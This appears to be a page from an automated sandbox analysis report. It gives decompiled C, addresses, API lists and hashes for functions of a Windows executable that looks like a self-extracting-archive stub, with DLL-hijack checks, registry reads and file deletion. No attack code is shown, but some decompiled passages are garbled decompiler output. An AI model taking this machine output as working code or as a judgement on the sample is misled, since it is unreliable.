				_t174 = 0;
				_a3 = 0;
				_t193 = GetModuleHandleW(L"kernel32");
				if(_t193 != 0) {
					_t168 = GetProcAddress(_t193, "SetDllDirectoryW");
					_t176 = _a46032;
					_t192 = _t168;
					if(_t192 != 0) {
						asm("sbb ecx, ecx");
						_t177 = _t192;
						 *0x403278( ~(_t176 & 0x000000ff) & 0x004035f4);
						 *_t192();
					}
					_t199 = GetProcAddress(_t193, "SetDefaultDllDirectories");
					if(_t199 != 0) {
						_t177 = _t199;
						 *0x403278((_t176 & 0x000000ff ^ 0x00000001) + 1 << 0xb);
						 *_t199();
						_v1 = 1;
					}
					_t174 = 0;
				}
				_t111 =  *0x40e1a4; // 0x403c2c
				_t201 = _t200 | 0xffffffff;
				_a8 = L"version.dll";
				_t194 = 0x800;
				_a12 = L"DXGIDebug.dll";
				_a16 = L"sfc_os.dll";
				_a20 = L"SSPICLI.DLL";
				_a24 = L"rsaenh.dll";
				_a28 = L"UXTheme.dll";
				_a32 = L"dwmapi.dll";
				_a36 = L"cryptbase.dll";
				_a40 = L"lpk.dll";
				_a44 = L"usp10.dll";
				_a48 = L"clbcatq.dll";
				_a52 = L"comres.dll";
				_a56 = L"ws2_32.dll";
				_a60 = L"ws2help.dll";
				_a64 = L"psapi.dll";
				_a68 = L"ieframe.dll";
				_a72 = L"ntshrui.dll";
				_a76 = L"atl.dll";
				_a80 = L"setupapi.dll";
				_a84 = L"apphelp.dll";
				_a88 = L"userenv.dll";
				_a92 = L"netapi32.dll";
				_a96 = L"shdocvw.dll";
				_a100 = L"crypt32.dll";
				_a104 = L"msasn1.dll";
				_a108 = L"cryptui.dll";
				_a112 = L"wintrust.dll";
				_a116 = L"shell32.dll";
				_a120 = L"secur32.dll";
				_a124 = L"cabinet.dll";
				_a128 = L"oleaccrc.dll";
				_a132 = L"ntmarta.dll";
				_a136 = L"profapi.dll";
				_a140 = L"WindowsCodecs.dll";
				_a144 = L"srvcli.dll";
				_a148 = L"cscapi.dll";
				_a152 = L"slc.dll";
				_a156 = L"imageres.dll";
				_a160 = L"dnsapi.DLL";
				_a164 = L"iphlpapi.DLL";
				_a168 = L"WINNSI.DLL";
				_a172 = L"netutils.dll";
				_a176 = L"mpr.dll";
				_a180 = L"devrtl.dll";
				_a184 = L"propsys.dll";
				_a188 = L"mlang.dll";
				_a192 = L"samcli.dll";
				_a196 = L"samlib.dll";
				_a200 = L"wkscli.dll";
				_a204 = L"dfscli.dll";
				_a208 = L"browcli.dll";
				_a212 = L"rasadhlp.dll";
				_a216 = L"dhcpcsvc6.dll";
				_a220 = L"dhcpcsvc.dll";
				_a224 = L"XmlLite.dll";
				_a228 = L"linkinfo.dll";
				_a232 = L"cryptsp.dll";
				_a236 = L"RpcRtRemote.dll";
				_a240 = L"aclui.dll";
				_a244 = L"dsrole.dll";
				_a248 = L"peerdist.dll";
				if( *_t111 == 0x78) {
					L15:
					GetModuleFileNameW(_t174,  &_a772, _t194);
					E003E0602( &_a9160, E003DC29A(_t215,  &_a772), _t194);
					_t189 = _t174;
					do {
						_t195 = _t174;
						if(E003DB146() < 0x600) {
							L19:
							_t87 = _t195 * 4; // 0x403c7c
							_t196 =  *(_t202 + _t87 + 0x18);
							_push(0x800);
							E003DC310(_t218,  &_a772, _t196);
							_t122 = GetFileAttributesW( &_a760); // executed
							if(_t122 != _t201) {
								_t189 = _t196;
								L23:
								if(_v1 != 0) {
									L29:
									_t225 = _t189;
									if(_t189 == 0) {
										return _t122;
									}
									E003DC2E4(_t225,  &_a768);
									if(E003DB146() < 0x600) {
										_push( &_a9160);
										_push( &_a768);
										E003D4092( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t189);
										_t202 = _t202 + 0x18;
										_t122 = AllocConsole();
										__eflags = _t122;
										if(_t122 != 0) {
											__imp__AttachConsole(GetCurrentProcessId());
											_t133 = E003F3E13( &_a4860);
											WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t133,  &_v4, 0);
											Sleep(0x2710);
											_t122 = FreeConsole();
										}
									} else {
										E003E081B(L"dwmapi.dll");
										E003E081B(L"uxtheme.dll");
										_push( &_a9152);
										_push( &_a760);
										E003D4092( &_a4852, 0x864, E003DE617(0xf1), _t189);
										_t202 = _t202 + 0x18;
										_t122 = E003EA7E4(0,  &_a4848, E003DE617(0xf0), 0x30);
									}
									ExitProcess(0);
								}
								_t197 = 0;
								while(1) {
									_t93 = _t197 * 4; // 0x403d44
									_t175 =  *(_t202 + _t93 + 0x38);
									_push(0x800);
									E003DC310(0,  &_a768, _t175);
									_t122 = GetFileAttributesW( &_a756);
									if(_t122 != _t201) {
										break;
									}
									_t197 = _t197 + 1;
									if(_t197 < 0x35) {
										continue;
									}
									goto L29;
								}
								_t189 = _t175;
								goto L29;
							}
							goto L20;
						}
						_t81 = _t195 * 4; // 0x403c7c, executed
						_t149 = E003E081B( *((intOrPtr*)(_t202 + _t81 + 0x18))); // executed
						if(_t149 == 0) {
							goto L19;
						}
						_t122 = CompareStringW(0x400, 0x1001,  *(_t202 + 0x24 + _t195 * 4), _t201, L"DXGIDebug.dll", _t201); // executed
						_t218 = _t122 - 2;
						if(_t122 != 2) {
							goto L20;
						}
						goto L19;
						L20:
						_t174 =  &(_t174->Internal);
					} while (_t174 < 8);
					goto L23;
				} else {
					_t190 = E003F75FB(_t177, _t111);
					if(_t190 == 0) {
						goto L15;
					}
					GetModuleFileNameW(_t174,  &_a4868, 0x800);
					_t198 = CreateFileW( &_a4868, 0x80000000, 1, _t174, 3, _t174, _t174);
					if(_t198 == _t201 || SetFilePointer(_t198, _t190, _t174, _t174) != _t190) {
						L14:
						CloseHandle(_t198);
						_t194 = 0x800;
						goto L15;
					} else {
						_t67 =  &_a4; // 0x403c7c
						if(ReadFile(_t198,  &_a13260, 0x7ffe, _t67, _t174) == 0) {
							goto L14;
						}
						_push(0x104);
						 *((short*)(_t202 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
						_push( &_a252);
						_push( &_a13260);
						while(1) {
							_t191 = E003E0371();
							_t215 = _t191;
							if(_t191 == 0) {
								goto L14;
							}
							E003E081B( &_a252);
							_push(0x104);
							_push( &_a248);
							_push(_t191);
						}
						goto L14;
					}
				}
			}



























                0x003e0868
                0x003e0871
                0x003e0878
                0x003e0882
                0x003e0886
                0x003e088e
                0x003e0894
                0x003e089b
                0x003e089f
                0x003e08a6
                0x003e08af
                0x003e08b1
                0x003e08b7
                0x003e08b7
                0x003e08c5
                0x003e08c9
                0x003e08d6
                0x003e08d8
                0x003e08de
                0x003e08e0
                0x003e08e0
                0x003e08e5
                0x003e08e5
                0x003e08e7
                0x003e08ec
                0x003e08ef
                0x003e08f7
                0x003e08fc
                0x003e0904
                0x003e090f
                0x003e0917
                0x003e091f
                0x003e0927
                0x003e092f
                0x003e0937
                0x003e093f
                0x003e0947
                0x003e094f
                0x003e0957
                0x003e095f
                0x003e0967
                0x003e096f
                0x003e0977
                0x003e097f
                0x003e0987
                0x003e098f
                0x003e0997
                0x003e099f
                0x003e09a7
                0x003e09af
                0x003e09b7
                0x003e09bf
                0x003e09c7
                0x003e09d2
                0x003e09dd
                0x003e09e8
                0x003e09f3
                0x003e09fe
                0x003e0a09
                0x003e0a14
                0x003e0a1f
                0x003e0a2a
                0x003e0a35
                0x003e0a40
                0x003e0a4b
                0x003e0a56
                0x003e0a61
                0x003e0a6c
                0x003e0a77
                0x003e0a82
                0x003e0a8d
                0x003e0a98
                0x003e0aa3
                0x003e0aae
                0x003e0ab9
                0x003e0ac4
                0x003e0acf
                0x003e0ada
                0x003e0ae5
                0x003e0af0
                0x003e0afb
                0x003e0b06
                0x003e0b11
                0x003e0b1c
                0x003e0b27
                0x003e0b32
                0x003e0b3d
                0x003e0b48
                0x003e0c14
                0x003e0c1e
                0x003e0c3b
                0x003e0c40
                0x003e0c42
                0x003e0c42
                0x003e0c4e
                0x003e0c7d
                0x003e0c7d
                0x003e0c7d
                0x003e0c88
                0x003e0c8f
                0x003e0c9c
                0x003e0ca4
                0x003e0cae
                0x003e0cb0
                0x003e0cb5
                0x003e0cec
                0x003e0cec
                0x003e0cee
                0x003e0e05
                0x003e0e05
                0x003e0cfc
                0x003e0d0b
                0x003e0d7a
                0x003e0d82
                0x003e0d96
                0x003e0d9b
                0x003e0d9e
                0x003e0da4
                0x003e0da6
                0x003e0daf
                0x003e0dc4
                0x003e0ddc
                0x003e0de7
                0x003e0ded
                0x003e0ded
                0x003e0d0d
                0x003e0d12
                0x003e0d1c
                0x003e0d28
                0x003e0d30
                0x003e0d4a
                0x003e0d4f
                0x003e0d69
                0x003e0d69
                0x003e0df5
                0x003e0df5
                0x003e0cb7
                0x003e0cb9
                0x003e0cb9
                0x003e0cb9
                0x003e0cc4
                0x003e0ccb
                0x003e0cd8
                0x003e0ce0
                0x00000000
                0x00000000
                0x003e0ce2
                0x003e0ce6
                0x00000000
                0x00000000
                0x00000000
                0x003e0ce8
                0x003e0cea
                0x00000000
                0x003e0cea
                0x00000000
                0x003e0ca4
                0x003e0c50
                0x003e0c54
                0x003e0c5b
                0x00000000
                0x00000000
                0x003e0c72
                0x003e0c78
                0x003e0c7b
                0x00000000
                0x00000000
                0x00000000
                0x003e0ca6
                0x003e0ca6
                0x003e0ca7
                0x00000000
                0x003e0b4e
                0x003e0b54
                0x003e0b59
                0x00000000
                0x00000000
                0x003e0b69
                0x003e0b89
                0x003e0b8d
                0x003e0c08
                0x003e0c09
                0x003e0c0f
                0x00000000
                0x003e0b9d
                0x003e0b9e
                0x003e0bb9
                0x00000000
                0x00000000
                0x003e0bc3
                0x003e0bc8
                0x003e0bd7
                0x003e0bdf
                0x003e0bfd
                0x003e0c02
                0x003e0c04
                0x003e0c06
                0x00000000
                0x00000000
                0x003e0bea
                0x003e0bef
                0x003e0bfb
                0x003e0bfc
                0x003e0bfc
                0x00000000
                0x003e0bfd
                0x003e0b8d

                APIs
                • GetModuleHandleW.KERNEL32(kernel32), ref: 003E087C
                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003E088E
                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003E08BF
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003E0B69
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003E0B83
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 003E0B93
                • ReadFile.KERNEL32(00000000,?,00007FFE,|<@,00000000), ref: 003E0BB1
                • CloseHandle.KERNEL32(00000000), ref: 003E0C09
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003E0C1E
                • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<@,?,00000000,?,00000800), ref: 003E0C72
                • GetFileAttributesW.KERNELBASE(?,?,|<@,00000800,?,00000000,?,00000800), ref: 003E0C9C
                • GetFileAttributesW.KERNEL32(?,?,D=@,00000800), ref: 003E0CD8
                  • Part of subcall function 003E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003E0836
                  • Part of subcall function 003E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003DF2D8,Crypt32.dll,00000000,003DF35C,?,?,003DF33E,?,?,?), ref: 003E0858
                • _swprintf.LIBCMT ref: 003E0D4A
                • _swprintf.LIBCMT ref: 003E0D96
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                • AllocConsole.KERNEL32 ref: 003E0D9E
                • GetCurrentProcessId.KERNEL32 ref: 003E0DA8
                • AttachConsole.KERNEL32(00000000), ref: 003E0DAF
                • _wcslen.LIBCMT ref: 003E0DC4
                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 003E0DD5
                • WriteConsoleW.KERNEL32(00000000), ref: 003E0DDC
                • Sleep.KERNEL32(00002710), ref: 003E0DE7
                • FreeConsole.KERNEL32 ref: 003E0DED
                • ExitProcess.KERNEL32 ref: 003E0DF5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                • String ID: (=@$,<@$,@@$0?@$0A@$4B@$8>@$D=@$DXGIDebug.dll$H?@$H@@$HA@$P>@$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=@$`@@$d?@$dA@$dwmapi.dll$h=@$h>@$kernel32$uxtheme.dll$|<@$|?@$|@@$<@$>@$?@$@@$A@
                • API String ID: 1207345701-3700324932
                • Opcode ID: a6dcdc8dc7f4e88b5131a82beddc9669303504adb806cc071c3f9fc2a6eef241
                • Instruction ID: e96de447d9d08220a10468f8fe695d788eec7b386c0b5edce51195efd3f84d44
                • Opcode Fuzzy Hash: a6dcdc8dc7f4e88b5131a82beddc9669303504adb806cc071c3f9fc2a6eef241
                • Instruction Fuzzy Hash: 51D187B10083959BD3219F51C948B9FBFECAF85705F50892EF285BA1D0C7B88649CB5A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EC73F Relevance: 49.4, APIs: 23, Strings: 5, Instructions: 428windowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 347 3ec73f-3ec757 call 3eeb78 call 3eec50 352 3ed40d-3ed418 347->352 353 3ec75d-3ec787 call 3eb314 347->353 353->352 356 3ec78d-3ec792 353->356 357 3ec793-3ec7a1 356->357 358 3ec7a2-3ec7b7 call 3eaf98 357->358 361 3ec7b9 358->361 362 3ec7bb-3ec7d0 call 3e1fbb 361->362 365 3ec7dd-3ec7e0 362->365 366 3ec7d2-3ec7d6 362->366 368 3ed3d9-3ed404 call 3eb314 365->368 369 3ec7e6 365->369 366->362 367 3ec7d8 366->367 367->368 368->357 381 3ed40a-3ed40c 368->381 371 3ec9be-3ec9c0 369->371 372 3eca5f-3eca61 369->372 373 3eca7c-3eca7e 369->373 374 3ec7ed-3ec7f0 369->374 371->368 377 3ec9c6-3ec9d2 371->377 372->368 379 3eca67-3eca77 SetWindowTextW 372->379 373->368 375 3eca84-3eca8b 373->375 374->368 378 3ec7f6-3ec850 call 3ea64d call 3dbdf3 call 3da544 call 3da67e call 3d6edb 374->378 375->368 380 3eca91-3ecaaa 375->380 382 3ec9e6-3ec9eb 377->382 383 3ec9d4-3ec9e5 call 3f7686 377->383 438 3ec98f-3ec9a4 call 3da5d1 378->438 379->368 385 3ecaac 380->385 386 3ecab2-3ecac0 call 3f3e13 380->386 381->352 389 3ec9ed-3ec9f3 382->389 390 3ec9f5-3eca00 call 3eb48e 382->390 383->382 385->386 386->368 402 3ecac6-3ecacf 386->402 394 3eca05-3eca07 389->394 390->394 399 3eca09-3eca10 call 3f3e13 394->399 400 3eca12-3eca32 call 3f3e13 call 3f3e3e 394->400 399->400 421 3eca4b-3eca4d 400->421 422 3eca34-3eca3b 400->422 406 3ecaf8-3ecafb 402->406 407 3ecad1-3ecad5 402->407 412 3ecb01-3ecb04 406->412 414 3ecbe0-3ecbee call 3e0602 406->414 411 3ecad7-3ecadf 407->411 407->412 411->368 417 3ecae5-3ecaf3 call 3e0602 411->417 419 3ecb06-3ecb0b 412->419 420 3ecb11-3ecb2c 412->420 430 3ecbf0-3ecc04 call 3f279b 414->430 417->430 419->414 419->420 433 3ecb2e-3ecb68 420->433 434 3ecb76-3ecb7d 420->434 421->368 429 3eca53-3eca5a call 3f3e2e 421->429 427 3eca3d-3eca3f 422->427 428 3eca42-3eca4a call 3f7686 422->428 427->428 428->421 429->368 448 3ecc06-3ecc0a 430->448 449 3ecc11-3ecc62 call 3e0602 call 3eb1be GetDlgItem SetWindowTextW SendMessageW call 3f3e49 430->449 469 3ecb6c-3ecb6e 433->469 470 3ecb6a 433->470 440 3ecb7f-3ecb97 call 3f3e13 434->440 441 3ecbab-3ecbce call 3f3e13 * 2 434->441 455 3ec9aa-3ec9b9 call 3da55a 438->455 456 3ec855-3ec869 SetFileAttributesW 438->456 440->441 463 3ecb99-3ecba6 call 3e05da 440->463 441->430 475 3ecbd0-3ecbde call 3e05da 441->475 448->449 454 3ecc0c-3ecc0e 448->454 481 3ecc67-3ecc6b 449->481 454->449 455->368 458 3ec90f-3ec91f GetFileAttributesW 456->458 459 3ec86f-3ec8a2 call 3db991 call 3db690 call 3f3e13 456->459 458->438 467 3ec921-3ec930 DeleteFileW 458->467 490 3ec8a4-3ec8b3 call 3f3e13 459->490 491 3ec8b5-3ec8c3 call 3dbdb4 459->491 463->441 467->438 474 3ec932-3ec935 467->474 469->434 470->469 478 3ec939-3ec965 call 3d4092 GetFileAttributesW 474->478 475->430 488 3ec937-3ec938 478->488 489 3ec967-3ec97d MoveFileW 478->489 481->368 485 3ecc71-3ecc85 SendMessageW 481->485 485->368 488->478 489->438 492 3ec97f-3ec989 MoveFileExW 489->492 490->491 497 3ec8c9-3ec908 call 3f3e13 call 3efff0 490->497 491->455 491->497 492->438 497->458
                C-Code - Quality: 58%
                			E003EC73F(void* __edx, void* __edi) {
				intOrPtr _t232;
				void* _t237;
				intOrPtr _t293;
				intOrPtr _t297;
				long _t308;
				void* _t311;
				signed int _t312;
				void* _t316;

				E003EEB78(0x402b20, _t316);
				_t232 = E003EEC50(0x1b888);
				if( *((intOrPtr*)(_t316 + 0xc)) == 0) {
					L180:
					 *[fs:0x0] =  *((intOrPtr*)(_t316 - 0xc));
					return _t232;
				}
				_push(0x1000);
				_push(_t316 - 0x15);
				_push(_t316 - 0xd);
				_push(_t316 - 0x588c);
				_push(_t316 - 0xf894);
				_push( *((intOrPtr*)(_t316 + 0xc)));
				_t232 = E003EB314(__edi, _t316);
				_t297 = _t232;
				 *((intOrPtr*)(_t316 + 0xc)) = _t297;
				if(_t297 != 0) {
					_t293 =  *((intOrPtr*)(_t316 + 0x10));
					_push(__edi);
					do {
						_t237 = _t316 - 0x588c;
						_t311 = _t316 - 0x1b894;
						_t308 = 6;
						goto L4;
						L6:
						while(E003E1FBB(_t316 - 0xf894,  *((intOrPtr*)(0x40e744 + _t312 * 4))) != 0) {
							_t312 = _t312 + 1;
							if(_t312 < 0xe) {
								continue;
							} else {
								goto L178;
							}
						}
						if(_t312 > 0xd) {
							goto L178;
						}
						switch( *((intOrPtr*)(_t312 * 4 +  &M003ED41B))) {
							case 0:
								__eflags = _t293 - 2;
								if(_t293 == 2) {
									_t308 = 0x800;
									E003EA64D(_t316 - 0x788c, 0x800);
									E003DA544(E003DBDF3(__eflags, _t316 - 0x788c, _t316 - 0x588c, _t316 - 0xd894, 0x800), _t293, _t316 - 0x8894, _t312);
									 *(_t316 - 4) = 0;
									E003DA67E(_t316 - 0x8894, _t316 - 0xd894);
									E003D6EDB(_t316 - 0x388c);
									while(1) {
										_push(0);
										_t255 = E003DA5D1(_t316 - 0x8894, _t316 - 0x388c);
										__eflags = _t255;
										if(_t255 == 0) {
											break;
										}
										SetFileAttributesW(_t316 - 0x388c, 0);
										__eflags =  *(_t316 - 0x2880);
										if(__eflags == 0) {
											L18:
											_t259 = GetFileAttributesW(_t316 - 0x388c);
											__eflags = _t259 - 0xffffffff;
											if(_t259 == 0xffffffff) {
												continue;
											}
											_t261 = DeleteFileW(_t316 - 0x388c);
											__eflags = _t261;
											if(_t261 != 0) {
												continue;
											} else {
												_t314 = 0;
												_push(0);
												goto L22;
												L22:
												E003D4092(_t316 - 0x1044, _t308, L"%s.%d.tmp", _t316 - 0x388c);
												_t318 = _t318 + 0x14;
												_t266 = GetFileAttributesW(_t316 - 0x1044);
												__eflags = _t266 - 0xffffffff;
												if(_t266 != 0xffffffff) {
													_t314 = _t314 + 1;
													__eflags = _t314;
													_push(_t314);
													goto L22;
												} else {
													_t269 = MoveFileW(_t316 - 0x388c, _t316 - 0x1044);
													__eflags = _t269;
													if(_t269 != 0) {
														MoveFileExW(_t316 - 0x1044, 0, 4);
													}
													continue;
												}
											}
										}
										E003DB991(__eflags, _t316 - 0x788c, _t316 - 0x1044, _t308);
										E003DB690(__eflags, _t316 - 0x1044, _t308);
										_t315 = E003F3E13(_t316 - 0x788c);
										__eflags = _t315 - 4;
										if(_t315 < 4) {
											L16:
											_t280 = E003DBDB4(_t316 - 0x588c);
											__eflags = _t280;
											if(_t280 != 0) {
												break;
											}
											L17:
											_t283 = E003F3E13(_t316 - 0x388c);
											__eflags = 0;
											 *((short*)(_t316 + _t283 * 2 - 0x388a)) = 0;
											E003EFFF0(_t308, _t316 - 0x44, 0, 0x1e);
											_t318 = _t318 + 0x10;
											 *((intOrPtr*)(_t316 - 0x40)) = 3;
											_push(0x14);
											_pop(_t286);
											 *((short*)(_t316 - 0x34)) = _t286;
											 *((intOrPtr*)(_t316 - 0x3c)) = _t316 - 0x388c;
											_push(_t316 - 0x44);
											 *0x43307c();
											goto L18;
										}
										_t291 = E003F3E13(_t316 - 0x1044);
										__eflags = _t315 - _t291;
										if(_t315 > _t291) {
											goto L17;
										}
										goto L16;
									}
									 *(_t316 - 4) =  *(_t316 - 4) | 0xffffffff;
									E003DA55A(_t316 - 0x8894);
								}
								goto L178;
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax = E003F3E13(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0x42fc94);
									__eax = E003F3E3E(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										__eax = E003F7686(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L003F3E2E(__esi);
									}
								}
								goto L178;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
								}
								goto L178;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L178;
								}
								__eflags =  *0x41a472 - __di;
								if( *0x41a472 != __di) {
									goto L178;
								}
								__eax = 0;
								__edi = __ebp - 0x588c;
								_push(0x22);
								 *(__ebp - 0x1044) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x588c) - __ax;
								if( *(__ebp - 0x588c) == __ax) {
									__edi = __ebp - 0x588a;
								}
								__eax = E003F3E13(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L178;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L64:
											__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L65:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x1044;
											__eax = E003F279B(__ebp - 0x1044, __ebp - 0x1044);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *(__eax + 2) - __bx;
												if( *(__eax + 2) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x1044;
											__edi = 0x41a472;
											E003E0602(0x41a472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
											__eax = E003EB1BE(__ebp - 0x1044, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
											__eax = SendMessageW(__esi, 0x143, __ebx, 0x41a472); // executed
											__eax = __ebp - 0x1044;
											__eax = E003F3E49(__ebp - 0x1044, 0x41a472, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
											}
											goto L178;
										}
										L53:
										__eflags = __ax;
										if(__ax == 0) {
											L55:
											__eax = __ebp - 0x1c;
											__ebx = 0;
											_push(__ebp - 0x1c);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0x433028();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x1044;
												_push(__ebp - 0x1044);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x1c));
												__eax =  *0x433024();
												_push( *(__ebp - 0x1c));
												 *0x433008() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x1044) = __cx;
											}
											__eflags =  *(__ebp - 0x1044) - __bx;
											if( *(__ebp - 0x1044) != __bx) {
												__eax = __ebp - 0x1044;
												__eax = E003F3E13(__ebp - 0x1044);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, "\\", __esi);
												}
											}
											__esi = E003F3E13(__edi);
											__eax = __ebp - 0x1044;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, __edi, 0x800);
											}
											goto L65;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L64;
										}
										goto L55;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L53;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L178;
									} else {
										__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, 0x800);
										goto L65;
									}
								}
							case 4:
								__eflags =  *0x41a46c - 1;
								__eflags = __eax - 0x41a46c;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__edx + 7) & __al;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L82:
									 *0x418457 = __cl;
									 *0x418460 = 1;
									goto L178;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0x418457 = __cl;
									L81:
									 *0x418460 = __cl;
									goto L178;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L82;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L178;
								}
								 *0x418457 = 1;
								goto L81;
							case 6:
								__edi = 0;
								 *0x41c577 = 1;
								__edi = 1;
								__eax = __ebp - 0x588c;
								__eflags =  *(__ebp - 0x588c) - 0x3c;
								__ebx = __esi;
								 *(__ebp - 0x14) = __eax;
								if( *(__ebp - 0x588c) != 0x3c) {
									L99:
									__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
									if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
										if( *((intOrPtr*)(__ebp + 0x10)) != 4) {
											goto L178;
										}
										__eflags = __ebx - 6;
										if(__ebx != 6) {
											goto L178;
										}
										__ecx = 0;
										__eflags = 0;
										_push(0);
										L105:
										_push(__edi);
										_push(__eax);
										_push( *(__ebp + 8));
										__eax = E003ED78F(__ebp);
										goto L178;
									}
									__eflags = __ebx - 9;
									if(__ebx != 9) {
										goto L178;
									}
									_push(1);
									goto L105;
								}
								__eax = __ebp - 0x588a;
								_push(0x3e);
								_push(__ebp - 0x588a);
								__eax = E003F22C6(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									L98:
									__eax =  *(__ebp - 0x14);
									goto L99;
								}
								_t111 = __eax + 2; // 0x2
								__ecx = _t111;
								 *(__ebp - 0x14) = _t111;
								__ecx = 0;
								 *__eax = __cx;
								__eax = __ebp - 0x10c;
								_push(0x64);
								_push(__ebp - 0x10c);
								__eax = __ebp - 0x588a;
								_push(__ebp - 0x588a);
								__eax = E003EAF98();
								 *(__ebp - 0x20) = __eax;
								__eflags = __eax;
								if(__eax == 0) {
									goto L98;
								}
								__esi = __eax;
								while(1) {
									__eflags =  *(__ebp - 0x10c);
									if( *(__ebp - 0x10c) == 0) {
										goto L98;
									}
									__eax = __ebp - 0x10c;
